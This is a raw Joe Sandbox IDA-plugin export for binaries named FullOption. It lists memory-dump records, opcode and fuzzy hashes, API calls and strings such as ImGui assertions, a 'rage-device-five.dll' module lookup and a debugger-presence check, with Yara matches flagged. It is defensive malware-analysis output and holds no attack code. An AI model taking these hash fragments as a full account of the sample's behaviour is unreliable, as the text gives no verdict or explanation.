                                                                                  • Opcode ID: a8f10322797d89fbd815548b8a2936db8de9b89fa171765c99907f95b8ca7cfc
                                                                                  • Instruction ID: a082ee057da7f4752a23efe3d391456c999dfd4a529e58b4724d90ed71b5e558
                                                                                  • Opcode Fuzzy Hash: a8f10322797d89fbd815548b8a2936db8de9b89fa171765c99907f95b8ca7cfc
                                                                                  • Instruction Fuzzy Hash: 42113671D0A7488FEB45DFA8C4992EDBBF0FF5A300F15416AD040E7292DB78A946CB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 115f4beff0a43181873dae801fe52c848e2a5825201edea3eab4c6604a3177c3
                                                                                  • Instruction ID: c7afc4ca203ff7546b21fdca3e715b75e5e2ef047a45ba336f012c1a653a6a0a
                                                                                  • Opcode Fuzzy Hash: 115f4beff0a43181873dae801fe52c848e2a5825201edea3eab4c6604a3177c3
                                                                                  • Instruction Fuzzy Hash: 9B01F930B1E6494FD794F72884E56E973D1EF8A214B505579C649C3282DE2CE8429791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3bf3d2bb5084d65a5bceb8e1bea9407e6a892106eabafe564c6d8c5deb2d5f30
                                                                                  • Instruction ID: 7864b3657353efb47c68a999a8fb272308a5ee3c2afbdd4ad97c899c707ce66d
                                                                                  • Opcode Fuzzy Hash: 3bf3d2bb5084d65a5bceb8e1bea9407e6a892106eabafe564c6d8c5deb2d5f30
                                                                                  • Instruction Fuzzy Hash: 46F0C230B2991A4BD7A4FB6C94A56BD73D6EBCA304F501539D64EC3381EE2CA84297C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c714d700a666eceb8c561cd7f4cbd6a6d5040343acb13f48cc9fcfdb111805b5
                                                                                  • Instruction ID: 04f94e4c7679034e6808fd761c1344757ccd2401053c007b59110c98b4a77612
                                                                                  • Opcode Fuzzy Hash: c714d700a666eceb8c561cd7f4cbd6a6d5040343acb13f48cc9fcfdb111805b5
                                                                                  • Instruction Fuzzy Hash: 20F02830B1E55A4BD7A4B7BC94A16B973D6EF8A314F105539D20EC3282DE2CB84157C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a67cf080187a6bf5435e4d5d56688ce9554c57997318bae989eaedcdb27cf0b3
                                                                                  • Instruction ID: 1fc11e36e764ed8ca9af3c48b16140a36550d9de0e7a267344322c275be57ae3
                                                                                  • Opcode Fuzzy Hash: a67cf080187a6bf5435e4d5d56688ce9554c57997318bae989eaedcdb27cf0b3
                                                                                  • Instruction Fuzzy Hash: F0E08602F1DD0A0BEBD466AC28A62F4A3C6EB99311F411079E10EC22C3DC5D5C826250
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$memmovememset
                                                                                  • String ID: 0 && "Unknown event!"$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Processed$Remaining$button >= 0 && button < ImGuiMouseButton_COUNT$i >= 0 && i < Size$it >= Data && it < Data + Size && it_last >= it && it_last <= Data + Size$key != ImGuiKey_None$n >= 0 && n < BITCOUNT
                                                                                  • API String ID: 552438767-2158933391
                                                                                  • Opcode ID: c5b2f93c008ec20ec66d66dc6653780923a603631ed3579612f058c584b2f2cc
                                                                                  • Instruction ID: e14909eef9d37ac396445bd54ba3603891ea77bc9c6e30e372bd4b56fee3fde3
                                                                                  • Opcode Fuzzy Hash: c5b2f93c008ec20ec66d66dc6653780923a603631ed3579612f058c584b2f2cc
                                                                                  • Instruction Fuzzy Hash: 90124772B0AAC282DB24AB26D8903BD7B60FB62704F447935EA5E872D5DF3CE554D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$memcpy
                                                                                  • String ID: ##Background$##Foreground$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?"$Size > 0$g.Initialized$i >= 0 && i < Size
                                                                                  • API String ID: 4292997394-2649955253
                                                                                  • Opcode ID: 9c57d097e4dc7c1e47ad1412a28234dcc63912c49c7a8f5ec45a6aa60ce63daa
                                                                                  • Instruction ID: ccbc03d5a1fc0416124290ca10326daf7423398efd54b053d7ed4ca39a361e27
                                                                                  • Opcode Fuzzy Hash: 9c57d097e4dc7c1e47ad1412a28234dcc63912c49c7a8f5ec45a6aa60ce63daa
                                                                                  • Instruction Fuzzy Hash: 5ED1E166A0AA8689EB20EF26D8843B937E0FB60748F956435EA0DC3695DF7CE441D740
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Module32$CloseCreateFirstHandleNextSnapshotToolhelp32_wcsicmp
                                                                                  • String ID: rage-device-five.dll
                                                                                  • API String ID: 913386257-3447752432
                                                                                  • Opcode ID: 4d4d085a09ea406d0a6650c1fafc6e620fe09175c417cfc87f0702fe32d0f2fb
                                                                                  • Instruction ID: d8d63b6f8acc83d00271f10f2cab5cdae2e649c2b61b64f098450a94ffda42da
                                                                                  • Opcode Fuzzy Hash: 4d4d085a09ea406d0a6650c1fafc6e620fe09175c417cfc87f0702fe32d0f2fb
                                                                                  • Instruction Fuzzy Hash: 56018865B4AB4395EA50AB13F8403356390FB94BA5F946235F96F832E4DF7CD1098700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$idx == 0 || idx == 1
                                                                                  • API String ID: 3234217646-38430178
                                                                                  • Opcode ID: a6383bf8c30ae6b6d4d7df7ed93f52b2fd1a22aef68cf5f1b79869cb41154e7e
                                                                                  • Instruction ID: 0fa6dcb5277d29a62d7e94b0d10eef51d0b6393d348e785b10880cfab3a6a3da
                                                                                  • Opcode Fuzzy Hash: a6383bf8c30ae6b6d4d7df7ed93f52b2fd1a22aef68cf5f1b79869cb41154e7e
                                                                                  • Instruction Fuzzy Hash: 42622E37D19A8985D352EB3790811B97390EF7E384F59BB32FA48B61A1DF38B4449B00
                                                                                  APIs
                                                                                  Strings
                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF6AE82DFDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                  • API String ID: 389471666-631824599
                                                                                  • Opcode ID: c96118b2a1bb4b6e7045220de9a7206541531b302e11febcd3609790495d3db0
                                                                                  • Instruction ID: 8b0fd8b8c3fdec59620f14acfcf2567932d956bdc67dfd1be8fdac269e62d12c
                                                                                  • Opcode Fuzzy Hash: c96118b2a1bb4b6e7045220de9a7206541531b302e11febcd3609790495d3db0
                                                                                  • Instruction Fuzzy Hash: E7118F32606B42A6E744AB23EA5037973A4FF64745F809075E65DC3A90EF3CE074C714
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 2933794660-0
                                                                                  • Opcode ID: ca667202f14c1a6e0b13675894097db6a8d9f3281fea9c76bce2cf7da216d0bf
                                                                                  • Instruction ID: d57b8bd35fa15273f452fb69709933f98aaef1966ab014997c78858e54b4b290
                                                                                  • Opcode Fuzzy Hash: ca667202f14c1a6e0b13675894097db6a8d9f3281fea9c76bce2cf7da216d0bf
                                                                                  • Instruction Fuzzy Hash: F7115A26B15F068AEB10DF61E8542B833A4FB69758F441E31EE2D837A4EF3CD1548340
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-525454446
                                                                                  • Opcode ID: 14fbbf1a8e4580d02a7e51032c196c344c8f73983c7a91c1bb4c903d81599984
                                                                                  • Instruction ID: 6846487ae5a453319c869e807317f8bfc33f6e9875dc89a50cfb620b585e6e76
                                                                                  • Opcode Fuzzy Hash: 14fbbf1a8e4580d02a7e51032c196c344c8f73983c7a91c1bb4c903d81599984
                                                                                  • Instruction Fuzzy Hash: EA518B72B141B94FEB68CA27A824F397B51D3D6742789A312FF8427D48C23CD211DB60
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6FBBBB), ref: 00007FF6AE6FB996
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$text_end != 0
                                                                                  • API String ID: 3234217646-3309589614
                                                                                  • Opcode ID: 7f8d785bfffbfa1fb31a851385fd255ed349757418afd190598a9c6df433cd1d
                                                                                  • Instruction ID: 47214a4e6606e11b7cc7bd5cc93b7a055243acd60c081dfb96f8479c3d1940bb
                                                                                  • Opcode Fuzzy Hash: 7f8d785bfffbfa1fb31a851385fd255ed349757418afd190598a9c6df433cd1d
                                                                                  • Instruction Fuzzy Hash: 97413921F0E25A86E921A92794841797751EF7AB80F5DFB32FD0C966D8DF3CE481A700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-525454446
                                                                                  • Opcode ID: 61d1d9843f2fac34c3074654a72697d1ec28b083c661e13c473b4e105f29b69f
                                                                                  • Instruction ID: 054a145abd08922bec5ba1ff3ae1fff9338571dde425046dd752ee719e2e6f74
                                                                                  • Opcode Fuzzy Hash: 61d1d9843f2fac34c3074654a72697d1ec28b083c661e13c473b4e105f29b69f
                                                                                  • Instruction Fuzzy Hash: 771129B160569286DB14CB22E8F417A77A0F3D5B82F45203BFB8E47A89DE3CD141CB10
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: freemalloc
                                                                                  • String ID:
                                                                                  • API String ID: 3061335427-0
                                                                                  • Opcode ID: 5d4f4bd983f7ae8a635a9113bb6c9c243f4f93f7876e5176fb6265752b30d512
                                                                                  • Instruction ID: ccc85b4ea013f4d31058661ea91356664f8f69f934826f3575ead54b5db39372
                                                                                  • Opcode Fuzzy Hash: 5d4f4bd983f7ae8a635a9113bb6c9c243f4f93f7876e5176fb6265752b30d512
                                                                                  • Instruction Fuzzy Hash: AEA25D33925B8886C706DF3B948116CB764FFA9B84B19EB16EE0863771DB25E494DB00
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF6AE6D24E3
                                                                                    • Part of subcall function 00007FF6AE82CCD0: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF6AE6D24C3), ref: 00007FF6AE82CCE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AcquireExclusiveHeapLockProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3110430671-0
                                                                                  • Opcode ID: 5d761ecea7066aa0cd86f7feae571afd8cee17af8a1d9723a7a84dee6768cdff
                                                                                  • Instruction ID: bdbba26843d12f838a238a0508f54eb998ac6b15e0db23b324726ebe5cb06a5f
                                                                                  • Opcode Fuzzy Hash: 5d761ecea7066aa0cd86f7feae571afd8cee17af8a1d9723a7a84dee6768cdff
                                                                                  • Instruction Fuzzy Hash: CE31B260D8AB0285FA41EB1AE8902B033A0AF76710F945175F61EC72B5FF7CA4A5C320
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID:
                                                                                  • API String ID: 3234217646-0
                                                                                  • Opcode ID: e9cb659dddd726f5077f0045d240b44a3c2984d0c4a604025afcd0621578549b
                                                                                  • Instruction ID: 256e5d7f610e551256aa00f02dca06c21d08c23b40d8d9776326fc0ab21b2bd6
                                                                                  • Opcode Fuzzy Hash: e9cb659dddd726f5077f0045d240b44a3c2984d0c4a604025afcd0621578549b
                                                                                  • Instruction Fuzzy Hash: CBD1366690FED255EB736E3740802BA27D8DF22B54FAC3931FD4D8A1C5EE6C5541A320
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6C39
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6E6C69
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6C95
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6CC3
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6CED
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6D14
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6D3B
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6D6F
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6DA3
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6D9DFC), ref: 00007FF6AE6E6DCA
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6E6DED
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6E6E1F
